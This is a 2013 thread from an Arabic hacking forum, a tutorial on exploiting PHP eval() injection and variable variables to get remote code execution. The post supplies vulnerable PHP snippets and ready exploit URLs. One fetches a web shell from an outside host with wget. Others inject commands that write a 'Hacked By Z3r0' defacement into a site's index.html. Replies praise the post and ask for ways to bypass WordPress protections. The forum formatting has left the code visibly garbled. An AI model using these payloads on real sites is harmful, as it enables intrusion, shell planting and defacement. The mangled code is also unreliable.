:: vBspiders Professional Network ::

:: vBspiders Professional Network :: (http://www.vbspiders.com/vb/index.php)
-   قـسـم إخـتـراق الـمـواقـع والـسـيرفـرات (http://www.vbspiders.com/vb/f38.html)
-   -   Dynamic Evaluation Variables | By Z3r0H4xor (http://www.vbspiders.com/vb/t67709.html)

Injection 06-03-2013 06:06 PM

Dynamic Evaluation Variables | By Z3r0H4xor
 
السلام عليكم ورحمة الله وبركاتة

سلام يارجالة اخباركم ايه ؟

اليوم بنتكلم عن البحث عن الثغرات في المتغيرات الديناميكية وكلنا نعرف انه لغة بي اتش بي مهمة في الاختراق كثير واكتشاف الثغرات بشكل كبير لنة المخترق يعتمد على ثغره ليخترق موقع معين , ونعرف انه سكربتات معروفة مبرمجة بل بي اتش بي مثل " Wordpress , Mybb, Joomla " استغلال المتغيرات الديناميكة تقدر تقول RCE ( Remote Code Execution التي تسمح بتنفيذ امر معين

كود PHP:

Dynamic Evaluation Variables 

تمام الان نبدا بـ


كود PHP:

Eval Injection 

الـ Eval Injection معروفة بـ RCE لما الهكر يتحكم بل ( String ) وحالة حال eval()


مثال

كود PHP:

$common-variable "command";
 
$x $_GET['arg'];
 eval(
"\$common-variable = \$x;"); 

نفس مانشوف مافيه علامة دولار في المتغير , يمكن ان نتخطاه عبر المدخلات الخاصة

وفي السطر الثاني التطبيق يسمح اننه ندخل واستخدام الـ $ للحصول على الارسال البيانات التطبيق
والخالدم لتنفيذها. ونحن ننظر في السطر الثالث ونشوف eval() وضيفتة يتم استدعاء
وهاذا تنفيذ سلاسل 2 المذكورة فوق وهاذا مثال بسيط عن استغلاله

كود PHP:

<?php
    $cmd
=$_GET['cmd'];
    eval(
$cmd);
    
?>

الاستغلال يحلوين يكون بهاذا الشكل ض1


كود PHP:

http://www.target.com/php-files/input.php?cmd=wget  www.mysite.com/shell.php 

نعرف انه فيه كثير ناس يحبون لغة البي اتش بي هي لفة بسيطة ولكنها قويه

الي تجي معها كثير وضايف , البي اتش بي يدعم المتغيرات وهي المتغيرات او التعيبرات
الي تقيم الى اسماء المتغيرات الاخرى < ~ مجرد تفكير في هاذا , ويقول لي ان لايسبب مشاكل
هذا التعبيرات ممكن استخدامها لتغير حيوي متغير الى يتم الوصول اليها او تععيين اثناء
تنفيذ البرنامج مريحة جدا ولكن فكر مره ثانية وراح يكون التفكير ان هاذا هو
غير امنة اذا لم تتم السيطرة على اسم المتغير او مظهره يمكن للمهاجم قراءة او كتابة
المتغيرات التعسفي مما تسبب حتى الان تنفيذ التعليمات البرمجية بعيد عن اخر .

مثال

كود PHP:

$var**** = "myvar";
 $
$var**** = 10;
 echo 
$myvar

هاذا بيطلب متغير $myvar وبيطبع الـ String عشرة " 10"


كود PHP:

$safevar "Welcome to my site";
 
$param1 "";
 
$param2 "";
 
$param3 "";
 
# my own "register globals" for param[1,2,3]
 
foreach ($_GET as $key => $value) {
    $
$key $value;
    echo 
$value;
 } 

زي مانسشوف الحين الملف يستخدم الطباعة Echo , Print ويطبع عباره " مرحبا بك في موقعي "

طبعا المخترق يقدر يستغل الثغره في متغير $safevar لشيء ثاني ولنقول مثلا
"echo Hacked By Z3r0 >> /home/var/www/public_html/index.html"

وتستغل بهاذي الطريقة

كود PHP:

 http://www.target.com/php-files/input.php?safevar=echo Hacked By  z3r0>> /home/var/www/public_html/index.html 

&


كود PHP:

$function-**** = "myfunction";
 
$Arg1 "hello";
 
$Arg2 "welcome to my site";
 $
$function-****("Arg1""Arg2");
 echo 
$myfunction

طريقة الاستغلال


كود PHP:

  http://www.target.com/php-files/input.php?Arg1=hello&Arg2=echo  Hacked By Z3r0 >>  /home/var/www/public_html/index.html 

انتهينا من الدرس ض1 بس حاب انبهه الي ماعجبة الدرس مايرد ض1


كتبتة لنة الملل سوا فايدة كبيرة خخخخ

grt'z : Dr.Aadil, Mr.Hx , alzh3r, PreStiGe511, Nok511 , All Members http://v4-team.com/cc/images/smilies/Mzh04208.gif

oblack 06-03-2013 10:35 PM

رد: Dynamic Evaluation Variables | By Z3r0H4xor
 
درس رائع واتمنى للاستمرار بوضع شروحات متقدمة هل ممكن تعمل لنا دراسة حول سكربت wordpress بشكل بحث مدروس بدقة واسباب الصعوبة بستغلال الثغرات بهذا السكربت حتى نستطيع نتوصل الى طريقة لتخطي الحماايات بيه .

Saad Ghamdi 06-03-2013 11:23 PM

رد: Dynamic Evaluation Variables | By Z3r0H4xor
 
يعطيك الف عافية درس أكثر من رائع وتشكر عليه
اتمنى نشوف لك شروحات اكثر يامبدع

dahapp 07-01-2013 01:31 AM

رد: Dynamic Evaluation Variables | By Z3r0H4xor
 
مشكوووور


الساعة الآن 05:03 AM


[ vBspiders.Com Network ]


SEO by vBSEO 3.6.0